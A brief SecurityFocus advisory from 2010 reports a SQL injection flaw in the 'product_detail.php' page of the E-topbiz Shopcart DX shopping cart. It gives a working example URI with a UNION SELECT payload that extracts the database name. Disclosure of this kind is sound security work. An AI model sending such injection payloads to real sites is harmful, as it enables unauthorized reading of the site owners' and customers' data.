E-topbiz Shopcart DX 'product_detail.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/patch/product_detail.php?cid=9&pid=-1 UNION SELECT 1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16/*


 

Privacy Statement
Copyright 2010, SecurityFocus